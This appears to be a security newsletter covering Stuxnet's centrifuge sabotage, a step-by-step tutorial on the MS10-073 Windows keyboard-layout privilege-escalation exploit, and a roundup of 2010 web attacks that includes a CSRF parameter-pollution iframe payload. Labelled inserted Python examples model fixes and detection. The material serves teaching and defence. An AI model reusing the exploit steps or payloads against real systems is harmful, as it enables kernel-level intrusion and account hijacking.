As described previously, module 315 precisely targets a uranium enrichment cascade. By slightly changing the rotation speed of the centrifuge, the malware causes premature wear that can lead to the self-destruction of the machine.

For its part, module 417 does not target the steam turbines at the Bushehr plant, directly or indirectly, as Langner originally thought, but targets the system in charge of part of the safety system for the enrichment centre. Among other things, this system would be in charge of emptying a defective centrifuge to avoid an accident leading to its premature destruction. This high-level safety system allows gas to be passed from one centrifuge to another, avoiding accidents and minimizing disruption, while maintaining the production yield. Module 417 is therefore responsible for an assembly of 6 cascades of 164 centrifuges, namely 984.

By manipulating these two controllers in this way, Stuxnet would be capable of simultaneously causing the destruction of IR-1 centrifuges through premature wear and reducing their yield by modifying the theoretical organization and configuration of each of the cascades.



Questions/answers concerning F-Secure
Mikko Hypponen from the F-Secure laboratory has drawn up a list of particularly interesting questions that shed light on a large number of points. We have therefore selected the most relevant questions to conclude this article.

What does it do then?
It infects the system, hides itself with a rootkit and sees if the infected computer is connected to a Siemens Simatic (Step7) factory system.

What does it do with Simatic?
It modifies commands sent from the Windows computer to the PLC (Programmable Logic Controllers, i.e. the boxes that actually control the machinery). Once running on the PLC, it looks for a specific factory environment. If this is not found, it does nothing.

Which plant is it looking for?
We don't know.

Has it found the plant it's looking for?
We don't know.

What would it do if it finds it?
The PLC modification searches for specific high-frequency converter drives (AC drives) and modifies their operation. Stuxnet searches for specific AC drives manufactured by Vacon (based in Finland) and Fararo Paya (based in Iran).

So does Stuxnet infect these Vacon and Fararo Paya drives?
No. The drives do not get infected. The infected PLC modifies how the drives run. The modification happens only when very specific conditions are all true at the same time, including an extremely high output frequency. Therefore, any possible effects would concern extremely limited AC drive application areas.

Some suggest the target of Stuxnet was the Natanz enrichment facility in Iran. Are there Vacon AC drives in these facilities?
According to Vacon, they are not aware of any Vacon drives in use in the Iranian nuclear program, and they can confirm that they have not sold any AC drives to Iran against the embargo.

In theory, what can Stuxnet do?
It can adjust the functioning of motors, pumps and conveyor belts. It can shut down a control unit. By changing the appropriate parameters, it can cause explosions.


Why is Stuxnet considered to be so complex?
It uses multiple vulnerabilities and drops its own driver to the system.

How can it install its own driver?
Stuxnet's driver was signed with a certificate stolen from Realtek Semiconductor Corp.

Has the stolen certificate been revoked?
Yes. VeriSign revoked it on July 16th. A modified variant signed with a certificate stolen from JMicron Technology Corp was found on July 17th.

What's the relation between Realtek and JMicron?
Nothing. But these companies have their HQs in the same office park in Taiwan, which is weird.

Did the Stuxnet creators find their own 0-day vulnerabilities or did they buy them from the black market?
We don't know.

How expensive would such vulnerabilities be?
This varies. A single remote code execution zero-day in a popular version of Windows could go for anything between $50,000 and $500,000.

Why was it so slow to analyze Stuxnet in detail?
It's unusually complex and unusually big. Stuxnet is over 1.5 MB in size.

When did Stuxnet start spreading?
In June 2009, or maybe even earlier. One of the components has a compile date in January 2009.

How long did it take to create Stuxnet?
We estimate that it took over 10 man-years to develop Stuxnet.

Who could have written Stuxnet?
Looking at the financial and R&D investment required and combining this with the fact that there's no obvious money-making mechanism within Stuxnet, that leaves only two possibilities: a terror group or a nation-state. And we don't believe any terror group would have this kind of resources.

So was Stuxnet written by a government?
That's what it would look like, yes.

Was it Israel? Egypt? Saudi Arabia? USA?
We don't know.

Was the target Iran?
We don't know.



Is it true that there are biblical references inside Stuxnet?
There is a reference to "Myrtus" (which is a myrtle plant). However, this is not "hidden" in the code. It's an artifact left inside the program when it was compiled. Basically this tells us where the author stored the source code in his system. The specific path in Stuxnet is: \myrtus\src\objfre_w2k_x86\i386\guava.pdb.

Could it mean something else?
Yeah: it could mean "My RTUs", not "Myrtus". RTU is an abbreviation for Remote Terminal Units, used in factory systems.

How does Stuxnet know it has already infected a machine?
It sets a Registry key with a value "19790509" as an infection marker.

What's the significance of "19790509"?
It's a date. 9th of May, 1979.

What happened on 9th of May, 1979?
Maybe it's the birthday of the author? Then again, on that date a Jewish-Iranian businessman called Habib Elghanian was executed in Iran. He was accused of spying for Israel.

Is there a link between Stuxnet and Conficker?
It's possible. Conficker variants were found between November 2008 and April 2009. The first variants of Stuxnet were found shortly after that. Both exploit the MS08-067 vulnerability. Both use USB sticks to spread. Both use weak network passwords to spread. And, of course, both are unusually complex.

Is there a link to any other malware?
Some Zlob variants were the first to use the LNK vulnerability.

Will Stuxnet spread forever?
The current versions have a "kill date" of June 24, 2012. It will stop spreading on this date.

How many computers did it infect?
Hundreds of thousands.

But Siemens has announced that only 15 factories have been infected.
They are talking about factories. Most of the infected machines are collateral infections, i.e. normal home and office computers that are not connected to SCADA systems.

How could the attackers get a trojan like this into a secure facility?
For example, by breaking into a home of an employee, finding his USB sticks and infecting it. Then wait for the employee to take the sticks to work and infect his work computer.



References


Hakin9 (Printer spooler article)
http://newsoft.dyndns.org/tech/PrintYourShell.pdf

Symantec (Report plus blog)
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf
http://www.symantec.com/connect/blog-tags/w32stuxnet

OSVDB
Microsoft Windows Shell LNK File Parsing Arbitrary Command Execution
http://osvdb.org/show/osvdb/66387
Siemens SIMATIC WinCC Default Password
http://osvdb.org/show/osvdb/66441
Microsoft Windows on 32-bit win32k.sys Keyboard Layout Loading Local Privilege Escalation
http://osvdb.org/show/osvdb/68517
Microsoft Windows Print Spooler Service RPC Impersonation StartDocPrinter Procedure Remote Code Execution
http://osvdb.org/show/osvdb/67988
Microsoft Windows on 32-bit Task Scheduler Crafted Application Local Privilege Escalation
http://osvdb.org/show/osvdb/68518

ESET (Report plus blog)
http://www.eset.com/resources/white-papers/Stuxnet_Under_the_Microscope.pdf
http://blog.eset.com/2010/09/23/eset-stuxnet-paper
Resources on Stuxnet: http://blog.eset.com/2011/01/03/stuxnet-information-and-resources

Microsoft
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx
http://www.microsoft.com/technet/security/bulletin/MS10-046.mspx
http://www.microsoft.com/technet/security/bulletin/MS10-061.mspx
http://www.microsoft.com/technet/security/bulletin/MS10-073.mspx
http://www.microsoft.com/technet/security/bulletin/MS10-092.mspx

F-Secure (FAQ)
http://www.f-secure.com/weblog/archives/00002040.html
http://www.f-secure.com/weblog/archives/00002066.html

Langner (Blog)
http://www.langner.com/en/blog/
http://www.controlglobal.com/articles/2011/IndustrialControllers1101.html?page=print

LEXSI
http://cert.lexsi.com/weblog/index.php/2011/01/31/397-dossier-stuxnet-de-la-vulnerabilite-lnk-au-sabotage-industriel

ISIS - Institute for Science and International Security
http://isis-online.org/isis-reports/detail/did-stuxnet-take-out-1000-centrifuges-at-the-natanz-enrichment-plant/8


KEYBOARD LAYOUT

Keyboard Layout and MS10-073: a look at one of the vulnerabilities exploited by Stuxnet
2010 was notable for several Windows vulnerabilities allowing a user to elevate their privileges (Scheduler, KeyboardLayout, NtGdiEnableEUDC and Windows Class). Several exploitation codes were made public. In this article, we are going to study the KeyboardLayout (CVE-2010-2743 MS10-073) vulnerability used by the Stuxnet worm to elevate its privileges under Windows 2000 and XP, and learn how to develop an associated proof of concept.


Florent Hochwelker XMCO

Reminder

User permissions under Windows

Under Windows, from version NT 3.51, it has been possible to create user accounts with restricted privileges, as well as administrator accounts. These ordinary users have limited permissions. For example, they cannot change certain system parameters, access directories belonging to other users or write into certain directories, such as the sensitive Windows directories.

From Windows 1.0 to Windows 98, Microsoft's operating system did not really offer separation between the various users. This was partly due to the fact that Windows was still based on MS-DOS. Version NT 4.0 of Windows, which came out in 1996, was the first Microsoft operating system to include permissions management on files and directories (ACL) using the NTFS file system.

Using these mechanisms, a virus that succeeds in infecting a machine but which executes with the permissions of an ordinary user would have a great deal of difficulty in entirely infecting the machine and hiding its presence within the system.

Differences between "user-land" and "kernel-land"

Before going into explanations of the vulnerability, let us recall the difference between the kernel area (kernel-land) and the user area (user-land).

When a processor of the x86 family functions in protected mode, it is capable of isolating the various processes that it executes using a ring mechanism. There are 4 different rings: Rings 0, 1, 2 and 3. Under Windows, only ring 0 and ring 3 are used. The kernel, which is executed in ring 0, has all privileges. It can therefore access any memory space.

The user's programs are isolated in ring 3 and cannot access the kernel memory space. Under Windows, the virtual memory space of each process is laid out as shown in the diagram below. Programs executed by ordinary users in ring 3 therefore cannot access addresses between 0x80000000 and 0xFFFFFFFF, which correspond to the kernel memory space (or at least not as ordinary users*).

* However, a user with administrator permissions can install a driver executing in ring 0, or, using certain APIs, modify the kernel memory zone. For example, under XP, the function NtSystemDebugControl() is used by the debugger Microsoft WinDbg.


KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY


The kernel provides a large number of system calls for performing numerous different actions. It is generally not advisable to call them directly.

When a program has to carry out certain tasks, it generally uses the APIs supplied by the Windows operating system. Let us take the example of the CreateFile API function, which can create or open a file on the disk.

The program in the user area (ring 3) will call the CreateFile function that is available in the kernel32.dll library. This library is also present in the user area. This function will perform several checks on the parameters passed and then, through a system call, will pass control to the kernel.

[Figure: Table of system calls]

For example, the Windows CreateFile function will use the system call NtCreateFile. The program therefore passes control to the kernel to create the requested file.

[Figure: Breakpoint on the system call (g: continues the execution of the program; kn: displays the call stack)]

It is then possible, as an ordinary user, to send data that will be processed in ring 0. So, in order to take control in kernel-land mode (ring 0), a vulnerability must be found within a kernel function or in a driver (hardware drivers also run in ring 0) which allows control to be taken of ring 0 to access this protected memory area, to which access is normally prohibited. The various processes under Windows have a system of tokens corresponding to identities which specify the permissions assigned to each of them. Once ring 0 is controlled, it is possible to modify the token of our application and replace it with a system token (NT AUTHORITY\SYSTEM), which will give us full permissions.

INFO
Keyboard Layout: what is it ?
The Keyboard Layout is a binary file describing the layout of the keys on the keyboard. There is therefore one file per keyboard layout. These files are in the form of libraries (DLL files) and are available in the directory "Windows/system32/". For example, the French keyboard corresponds to the file "kbdfr.dll".

The vulnerability comes from an overflow of the table of pointers used in the function xxxKENLSProcs contained in the library win32k.sys. win32k is a library of functions loaded into kernel-land (ring 0) and accessible via system calls, which, among other things, manages various graphical rendering tasks.

[Figure: Vulnerable code within the function xxxKENLSProcs]

We can see that the code calls a function through the pointer _aNLSVKFProc[ecx*4], taking as a parameter the value of a byte located at address [eax-83h]. This value corresponds to the index into a table that originally contains only 3 entries representing 3 functions (indexed from 0 to 2). Before Microsoft published bulletin MS10-073, no check was made on this index. Consequently, it was possible to overrun the table. For example, by specifying an index of 5, we can redirect the call to the address 0x60636261 located in the user area, where we may have previously placed our malevolent code (payload). As a reminder, the user-land area contains addresses between 0x00000000 and 0x7FFFFFFF. We can therefore allocate memory at the address 0x60636261 and write whatever we want to it. It is important to note that this value may vary according to operating systems and service packs.

[Figure: Libraries corresponding to the various Keyboard Layouts present under Windows XP]

[Figure: Content of table aNLSVKFProc (dds: displays the data in the table and the associated symbols)]

Keyboard Layout and Stuxnet

The vulnerability that we are going to present was exploited by the Stuxnet virus. As a reminder, Stuxnet implemented two zero-day vulnerabilities allowing elevation of privileges on all versions of the Windows operating system (from 2000 to Seven). The KeyboardLayout vulnerability is used by the virus to elevate its privileges under Windows 2000 and XP.

Analysis of the vulnerability


Now let's get to the heart of the subject: the exploitation of the vulnerability. Brace yourselves!

The vulnerability

When Windows loads a new Keyboard Layout, it calls an API function "LoadKeyboardLayout()" present within the library user32.dll. This function takes an identifier as a parameter, in the form of a character string, together with a flag.

It is normally impossible to load a Keyboard Layout other than those provided by the system as an ordinary user. By looking more closely at this function, we notice that it uses a system call "win32k!NtUserLoadKeyboardLayoutEx" (present in win32k.sys). The prototype for this function is available in the ReactOS documentation*. The call takes 7 parameters, the first of which corresponds to a HANDLE.

This value (HANDLE) corresponds to one of the Keyboard Layout files. We can use the Windows API "CreateFile()" function to open our specially designed Keyboard Layout and recover a valid HANDLE corresponding to our file. In order to check which parameters must be passed to this function, we are going to study how it is called using a Windows debugger. For this, we are going to put a breakpoint on the system call "win32k!NtUserLoadKeyboardLayoutEx".

* Free OS compatible with Windows XP


[Figure: Triggering the call to NtUserLoadKeyboardLayoutEx, with the 1st and last parameters highlighted]

[Legend: g: continue execution of the program; dps: display the content of the stack; !handle: display the information on the specified handle]

We can see that the 1st parameter is indeed our HANDLE. The 2nd parameter corresponds to offsets. It is formed of two groups of two bytes, here 0x0000 and 0x1768. The 3rd parameter is a pointer to a UNICODE_STRING structure representing the name of the Keyboard Layout. We can put an arbitrary value into it. The 4th parameter also represents a HANDLE, but a more specific one: it represents the Keyboard Layout that is currently in use. The 5th parameter is again a pointer to a UNICODE_STRING structure representing the ID of the layout. The 6th parameter is a value representing a Keyboard Layout identifier. Lastly, the 7th parameter is a flag: 0x82 represents the flags 0x2 (KLF_SUBSTITUTE_OK) and 0x80 (KLF_NOTELLSHELL).

The system call is not accessible directly. Consequently, we have to use assembler code to make the call. Under Windows XP, it is possible to pass control to the kernel using the instruction "sysenter". The APIs available in user32.dll and ntdll.dll all use the same method to make this system call under Windows XP.

[0] mov eax, XXXh
[1] mov edx, 7FFE0300h
[2] call dword ptr [edx]
[3] retn 1Ch

Code for making the syscall

[0] eax is used to specify the number of the system call used. The list of system calls is available on the Internet. That of "NtUserLoadKeyboardLayoutEx" is 0x11C6.

[1] We place the address 0x7FFE0300 in the register EDX. At this address, which is fixed under Windows XP, is a pointer to the following assembler instructions for moving to ring 0:

mov edx, esp
sysenter

[Legend: dd: display memory as doublewords; u: disassemble from the given address]

[2] The call to the assembler instructions located at the address referenced by edx (0x7FFE0300) allows entry into ring 0.

[3] Finally, this last assembler instruction resumes execution of the program in ring 3.

In our exploitation code, we use a function of the "naked" type so as not to be bothered by the assembler prolog (push ebp; mov ebp, esp). The code in the _asm block corresponds to the system call used. We are going to use the values recovered from the breakpoint to stay as close as possible to valid values.

Here, hFile is a HANDLE corresponding to our copy of kbdfr.dll. The 2nd argument is an offset pointing to a structure contained in kbdfr.dll. We use the value observed with the debugger, to be sure of having a correct value.

To be sure that we have a valid Keyboard Layout, we simply copy kbdfr.dll and attempt to load it. Once the code is executed, it appears that nothing has happened. However, we may notice that when changing the input language associated with the keyboard using the shortcut Alt+Shift, a new icon with question marks (?) appears alongside the "FR" and "EN" icons corresponding to the two keyboard layouts loaded on our system.

[Figure: the language bar after pressing Shift+Alt]

Our Keyboard Layout is therefore correctly applied. It corresponds exactly to the layout of the French keyboard that was previously loaded.

The vulnerability is based on the fact that the 2nd argument passed to NtUserLoadKeyboardLayoutEx represents two offsets, each stored over two bytes. When loading a French keyboard, the default value is 0x1768. In order to be able to reach the vulnerable code xxxKENLSProcs, we are going to modify this value to point to the KBDNLSTABLES structure (see below) added within our malicious kbdfr.dll file.

Here are the two structures to be added to our malicious DLL. These structures are constituted as follows:

[Figure: Content of the modified library (DLL)]

We write both structures directly into our copy of the file kbdfr.dll. Here, we choose to modify a text zone for greater simplicity. It should be noted that it is not necessary for the loaded file to be a valid PE binary. For example, Stuxnet used a text file containing these two structures and not a full valid Keyboard Layout file. In the 2nd parameter, we pass the offset at which the KBDNLSTABLES structure is located.

When the keyboard is loaded and the user presses a key, the function xxxKENLSProcs is called. A check is made on the global variable gpKbdNlsTbl. This value represents our offset passed as the 2nd argument when loading the Keyboard Layout.

INFO
Analyse diffrentielle du correctif MS10-073
Microsoft a corrig cette vulnrabilit avec le correctif MS10-073. Pour cela, quelques lignes de codes ont t ajoutes (en rouge) afin de contrler que la valeur de lindex soit infrieure 3.

In order to execute the code present at the address Ox60636261 located at index 5 of table win32k! aNLSVKFProc, the variable NLSFEProcType of the structure VK_F needs to be set to 5. The code corresponding to the Virtual Key (variable Vk) is an arbitrary value that we must reuse later on. We will leave this value at 0 (like stuxnet) for greater simplicity.

All the other variables can be set to 0. pVkToF is a relative virtual address (RVA). Which gives us:

This document is the property of XMCO Partners. Any reproduction is !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!![35] strictly prohibited.

WWW.XMCO.FR

The variable pVkToF of the structure KBONLSTABLES must point to the structure VK_F. Given that we need a structure VK_F to trigger the vulnerability, we are going to set NumOfVkToF to 1.

KEYBOARD LAYOUT: ANALYSIS OF THE VULNERABILITY
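As an added example (not code from the article, from Stuxnet or from Microsoft's patch), the following Python models the index check that the MS10-073 fix introduces. It parses a KBDNLSTABLES/VK_F pair out of a byte buffer using a simplified, constructed field layout (only the fields named above, each as a u32; not the real win32k structure layout) and refuses any NLSFEProcType that falls outside the three-entry aNLSVKFProc table, which is exactly the case the exploit relies on.

```python
import struct

# Constructed, simplified field layouts (not the real win32k definitions); every
# field is a little-endian u32 so the parsing stays readable.
#   KBDNLSTABLES: NumOfVkToF (u32), pVkToF (u32, RVA relative to buffer start)
#   VK_F:         Vk (u32), NLSFEProcType (u32)
KBDNLSTABLES_FMT = "<II"
VK_F_FMT = "<II"
NLS_PROC_COUNT = 3  # entries in win32k!aNLSVKFProc, as the text describes

# Stand-ins for the three real table entries (names are placeholders).
A_NLS_VKF_PROC = ["nls_proc_0", "nls_proc_1", "nls_proc_2"]


class InvalidNlsTable(ValueError):
    """Raised when the layout buffer would drive an out-of-range dispatch."""


def parse_vk_f_entries(buf: bytes, table_offset: int) -> list:
    """Read KBDNLSTABLES at table_offset and return its VK_F entries as dicts.

    table_offset plays the role of the offset passed as the 2nd argument of
    NtUserLoadKeyboardLayoutEx. Only bounds on the buffer are checked here;
    the index check added by MS10-073 lives in dispatch_nls_proc().
    """
    hdr_size = struct.calcsize(KBDNLSTABLES_FMT)
    if table_offset < 0 or table_offset + hdr_size > len(buf):
        raise InvalidNlsTable("KBDNLSTABLES offset outside the buffer")
    num_vk_to_f, p_vk_to_f = struct.unpack_from(KBDNLSTABLES_FMT, buf, table_offset)
    entry_size = struct.calcsize(VK_F_FMT)
    if p_vk_to_f + num_vk_to_f * entry_size > len(buf):
        raise InvalidNlsTable("pVkToF/NumOfVkToF point outside the buffer")
    entries = []
    for i in range(num_vk_to_f):
        vk, proc_type = struct.unpack_from(VK_F_FMT, buf, p_vk_to_f + i * entry_size)
        entries.append({"Vk": vk, "NLSFEProcType": proc_type})
    return entries


def dispatch_nls_proc(entry: dict) -> str:
    """Model xxxKENLSProcs selecting a handler from aNLSVKFProc, fix applied.

    Before MS10-073 the index was used as-is, so NLSFEProcType = 5 fetched a
    "function pointer" beyond the 3-entry table (0x60636261 in the article's
    walkthrough). The patch rejects any index >= 3 before the call is made.
    """
    idx = entry["NLSFEProcType"]
    if idx >= NLS_PROC_COUNT:
        raise InvalidNlsTable(f"NLSFEProcType {idx} outside aNLSVKFProc")
    return A_NLS_VKF_PROC[idx]


def build_layout_blob(proc_type: int, vk: int = 0) -> tuple:
    """Construct a buffer shaped like the patched region of the article's
    kbdfr.dll copy: some padding, then KBDNLSTABLES, then one VK_F.

    Returns (buffer, offset_of_KBDNLSTABLES).
    """
    padding = b"\x00" * 0x10  # stands in for the bytes before the text zone
    p_vk_to_f = len(padding) + struct.calcsize(KBDNLSTABLES_FMT)
    table = struct.pack(KBDNLSTABLES_FMT, 1, p_vk_to_f)  # NumOfVkToF = 1
    vk_f = struct.pack(VK_F_FMT, vk, proc_type)
    return padding + table + vk_f, len(padding)


def load_and_dispatch(buf: bytes, table_offset: int) -> list:
    """Parse the tables and resolve every VK_F entry, as the fixed code would."""
    return [dispatch_nls_proc(e) for e in parse_vk_f_entries(buf, table_offset)]


if __name__ == "__main__":
    blob, off = build_layout_blob(proc_type=1)
    print("valid layout ->", load_and_dispatch(blob, off))
    blob, off = build_layout_blob(proc_type=5)  # the value the article sets
    try:
        load_and_dispatch(blob, off)
    except InvalidNlsTable as exc:
        print("rejected     ->", exc)
```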


The exploitation code

Let's examine our code in order to understand the sequence of events during exploitation.

1. Recover the HANDLE corresponding to the current Keyboard Layout returned by the API function "GetKeyboardLayout()" so that a valid value can be used.
HKL hKL = GetKeyboardLayout(GetCurrentThreadId());

2. Load our malicious Keyboard Layout using our parameters (including the previously-recovered value, which is passed as the 4th parameter (hKL)) with the system call NtUserLoadKeyboardLayoutEx.
NtUserLoadKeyboardLayoutEx(hFile, 0x1B001768, &emptySTRING, hKL, &puszKLID, 0x09990999, 0x82);

3. Activate our Keyboard Layout using the API function ActivateKeyboardLayout(), taking as a parameter our hKL.
ActivateKeyboardLayout(hKL, 0x82);

4-5. Exploit the vulnerability with a Windows API for simulating the newly mapped key corresponding to the value of the Virtual Key Vk specified in the structure VK_F.
SendInput(1, &key, sizeof(key));

6. Program halt (crash) at address 0x60636261. The exploitation of the vulnerability is successful.

By specifying an index of 5, we can redirect the call to the address 0x60636261 located in the user area, where we may have previously placed our malevolent code.

Technical solution for changing the permissions of the current process from the kernel area

Lastly, the final stage consists of elevating our privileges by using our own payload (shellcode) located at the address 0x60636261. For this, it is necessary to allocate memory using the VirtualAlloc() API function, then to place our payload within it. As the address 0x60636261 is located within the user area, this is no problem. The payload will then be executed in the same context as the kernel, namely ring 0.

Our payload must be able to execute the following actions:
1) Browse the processes open on the system.
2) Find a SYSTEM process.
3) Copy the token for this process.
4) Copy this token into our own process.

Our elevation of privileges is now finished. Our process is now running with SYSTEM privileges.

Execution of the program from a user account

References
Vupen's analysis: http://www.vupen.com/blog/20101018.Stuxnet_Win32k_Windows_Kernel_zeroday_Exploit_CVE-2010-2743.php
ESET's analysis: http://blog.eset.com/2010/10/15/win32k-sys-about-the-patched-stuxnet-exploit

CURRENT NEWS

Current news...

What has been happening over the last few weeks within the small world of IT security?

As at the end of each year, Jeremiah Grossman presented the top 10 hacking techniques. Some zero-day vulnerabilities discovered within Internet Explorer spoiled Microsoft's Christmas holidays. Lastly, we will return to a particularly successful attack on servers hosting the ProFTPD project and we will assess the second edition of GS Days.

Adrien GUINAULT

Penetration test/attacks: Top 10 techniques of the year 2010
Zero-day vulnerability: Microsoft Internet Explorer import CSS
Conference: The GS Days 2010
Attack/Cyber criminality: Zero-day attack on servers hosting the ProFTPD project

Top 10 hacking techniques 2010

Each year since 2006, Jeremiah Grossman has put together the "top 10" new web attacks of the previous year. The process of selection, which applies to the 69 new techniques that were on the list in 2010, has been reviewed. To establish the top 15, Internet users initially voted for their favorite new techniques. Then, a panel of security experts classified this top 15 to obtain the top 10 new web attacks of 2010. Here is a quick summary of the attacks which have marked the year 2010.

Padding oracle (Juliano Rizzo, Thai Duong)
Juliano Rizzo and Thai Duong are at the top of this list with their research into Padding Oracle, which we present in detail in the next issue.

Evercookie (Samy Kamkar)
Evercookie is an API developed in JavaScript. It can force a browser to store a cookie permanently. To do this, Evercookie uses numerous techniques (HTTP cookie, Flash cookies, Silverlight storage, Web history, ETags, web cache, etc.) to store a cookie in numerous locations. Therefore, a cookie cannot be deleted via the standard functions offered by web browsers. Each technique is very interesting, such as the creation of a PNG image from a cookie. The code and the description of the techniques used are available at the following address: http://samy.pl/


Hacking Auto-Complete (Jeremiah Grossman)
As usual, Jeremiah Grossman was in the top three of this list, with several vulnerabilities identified within the main browsers on the market. His research showed that it was possible to manipulate browsers' caches, particularly information saved when HTTP forms are submitted. When HTTP forms use the attribute autocomplete=off, this parameter tells browsers not to save the information. In most of the forms found on the Internet, this attribute is not used. It therefore makes it easier for Internet users to complete forms. Through some ingenious JavaScript code, Jeremiah showed that this information could easily be disclosed. Different code is offered for the four main browsers, either to write within the cache or to read information. The most interesting of these four proofs of concept concerns Internet Explorer 6 and 7. The JavaScript code that is offered allows the use of the "down" key when a user is on an entry field. This will automatically show the various proposals contained within the browser. This code will then go through the history and auto-submit the content to a third-party domain controlled by the pirate.

Attacking HTTPS with Cache Injection (Elie Bursztein, Baptiste Gourdin, Dan Boneh)
The HTTPS Cache Injection attack consists of injecting a JavaScript library within a browser, in order to intercept the data exchanged between the victim and a website based on the HTTPS protocol. According to the authors, 43% of the top 10,000 sites use external JavaScript libraries. Consequently, if a pirate compromises a site hosting one of these libraries, it may affect the confidentiality of the sites that use this code. In other words, the malicious JavaScript code that is loaded will intercept the data exchanged between the victim's browser and the website that uses the library in question. The authors gave no further explanations. They nevertheless put several videos online. Their proofs of concept work, but several limitations make exploitation difficult:
- The error message on the validity of the certificate is displayed on the screen.
- Under Internet Explorer, several display bugs and a slowdown could quickly raise the suspicions of an Internet user.
The demonstration is nevertheless impressive. Using this method, the researchers were able to steal connection identifiers for sites such as Twitter or Blogger.com.

Universal XSS in IE8 (Eduardo Vela - sirdarckcat, David Lindsay - thornmaker)
Without going into the details, the two researchers showed various techniques for carrying out Cross-Site Scripting within Internet Explorer 8, bypassing the filters implemented within this new browser.

Bypassing CSRF protections with ClickJacking and HTTP Parameter Pollution (Lavakumar Kuppan, Manish Saindane)
ClickJacking attacks already caused considerable comment some time ago. With proofs of concept and presentations at Black Hat, the subject has been examined in depth. Lavakumar Kuppan and Manish Saindane presented a technique for bypassing the CSRF protection in place on JSP and ASP.NET applications. An example will illustrate this better than any explanation. Imagine an application which, once the user is authenticated, allows their e-mail address to be updated. To protect itself against CSRF attacks, the developers add a unique token in a hidden field when the update form is accessed. In this case, the page that will process the received data is a JSP page named updateEmail.jsp. The code checks that the token submitted by the user is valid before updating the e-mail address. A legitimate request sent from the HTML form would be as follows:

However, if the victim visits a website which uses an iFrame as follows:
<iframe src="http://www.example.com/updateEmail.jsp?email=evil@attackermail.com">
the victim will, without their knowledge, send a POST request as follows:

Consequently, the JSP code will have to process two email fields: one coming from the URL and the other coming from the arguments of the POST request. This dual use is an attack technique called HTTP Parameter Pollution, which can trap the JSP code, because it processes the field received in the URL first. Therefore, a pirate can use this method to force a connected user to change their e-mail address without their knowledge, while bypassing the anti-CSRF code.
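The parameter-pollution bypass described above, as an added example in Python (not the researchers' code, nor the JSP page from their presentation): a model of getParameter()-style merging in which URL values come before POST values, the vulnerable updateEmail handler beside a hardened one, and constructed legitimate and iframe-driven requests run against both. The session token and addresses are constructed.

```python
import hmac
from urllib.parse import parse_qs

# Constructed session state: the anti-CSRF token the server placed in the hidden
# field of the update form (a real application generates this per session).
SESSION_TOKEN = "c0ffee-constructed-token"


def merged_parameters(query_string: str, body: str) -> dict:
    """Model getParameter()-style merging: query-string values come first.

    This is the behaviour the article attributes to the JSP code: a name
    present in both the URL and the POST body yields the URL value first.
    """
    merged = {}
    for source in (query_string, body):
        for name, values in parse_qs(source, keep_blank_values=True).items():
            merged.setdefault(name, []).extend(values)
    return merged


def update_email_vulnerable(query_string: str, body: str) -> tuple:
    """updateEmail.jsp as described: token checked, email read after merging."""
    params = merged_parameters(query_string, body)
    token = params.get("token", [""])[0]
    if not hmac.compare_digest(token, SESSION_TOKEN):
        return ("rejected", "bad token")
    if "email" not in params:
        return ("rejected", "no email")
    return ("updated", params["email"][0])  # first value = the one from the URL


def update_email_hardened(query_string: str, body: str) -> tuple:
    """Same endpoint with parameter pollution closed off.

    State-changing parameters are read from the POST body only, and any
    attempt to supply them through the URL, or more than once, is rejected.
    """
    query = parse_qs(query_string, keep_blank_values=True)
    form = parse_qs(body, keep_blank_values=True)
    protected = {"email", "token"}
    if protected & set(query):
        return ("rejected", "protected parameter supplied in URL")
    if any(len(form.get(name, [])) != 1 for name in protected):
        return ("rejected", "missing or duplicated parameter")
    if not hmac.compare_digest(form["token"][0], SESSION_TOKEN):
        return ("rejected", "bad token")
    return ("updated", form["email"][0])


# Constructed requests. The legitimate form posts the user's own address with
# the valid token. In the attack the victim submits that very form, but framed
# by the pirate's page, so the request URL already carries email=evil@... .
LEGIT_QUERY, LEGIT_BODY = "", f"email=me@example.com&token={SESSION_TOKEN}"
ATTACK_QUERY, ATTACK_BODY = "email=evil@attackermail.com", LEGIT_BODY

if __name__ == "__main__":
    for label, handler in (("vulnerable", update_email_vulnerable),
                           ("hardened  ", update_email_hardened)):
        print(label, "legit :", handler(LEGIT_QUERY, LEGIT_BODY))
        print(label, "attack:", handler(ATTACK_QUERY, ATTACK_BODY))
```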

HTTP POST DoS (Wong Onn Chee, Tom Brennan)
Attacks of the "denial of service" type caused much comment, particularly with the "Slowloris" attack. The attack in question is based on the massive dispatch of HTTP requests of the POST type. A pirate first sends the header of the POST request containing a valid Content-Length field. Subsequently, the body of the HTTP request is sent to the server very slowly, while remaining sufficiently quick to avoid being cut off by the timeout. This behavior has the effect of forcing a server to exhaust its resources (memory and CPU), which, in the case of high demand, causes a denial of service. According to the researchers, just several hundred such requests could crash a vulnerable server. Very quickly after their presentation, tools were published:
- RUDY (R-U-Dead-Yet)
- OWASP HTTP Post Tool
These tools are very easy to use and can have disastrous consequences. The Slow Headers or Slow POST attack method, and the connection rate, are chosen. Several seconds are enough to cause a denial of service.

To finish, the researcher Onn Chee also presented a scenario in which a pirate makes a web page available containing a Java applet capable of carrying out such an attack. The malicious software would be provided to Internet users in the form of a game to attract them and cause them to execute the software. Finally, such an attack would be very difficult to trace, because of the disappearance of the traces: as soon as a user closes the browser or empties the cache, the attack from that zombie would stop and no traces would remain on the workstation. Also, the more this game is used by Internet users, the more effective the attack would be. A full presentation of this attack was given at the OWASP conference: http://www.hybridsec.com/papers/OWASP-UniversalHTTP-DoS.ppt

JavaSnoop (Arshan Dabirsiaghi)
After the diverse and varied web attacks, a tool also makes it into the top 10. JavaSnoop is a program for intercepting the methods and data used within a Java program. Java applications may often be audited using a decompiler such as Jad and a debugger attached to the program to be audited. However, JavaSnoop eliminates this stage and can intercept all inputs and outputs of the program.
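Server-side detection of the slow POST technique described above (HTTP POST DoS), as an added example that is not part of the article or of the researchers' material: each in-flight request body is judged on its average rate and its projected completion time rather than on an idle timeout, which is precisely what a trickling body is built to survive. The thresholds and the sample transfers are constructed.

```python
from collections import Counter
from dataclasses import dataclass, field


@dataclass
class BodyTransfer:
    """One in-flight POST body as a server-side monitor would track it.

    Timestamps are constructed, in seconds since an arbitrary epoch.
    """
    client_ip: str
    content_length: int     # value announced in the Content-Length header
    started_at: float       # when the headers had been fully received
    chunks: list = field(default_factory=list)  # (timestamp, bytes_received)

    def received(self, now: float) -> int:
        """Bytes of body that had arrived by time `now`."""
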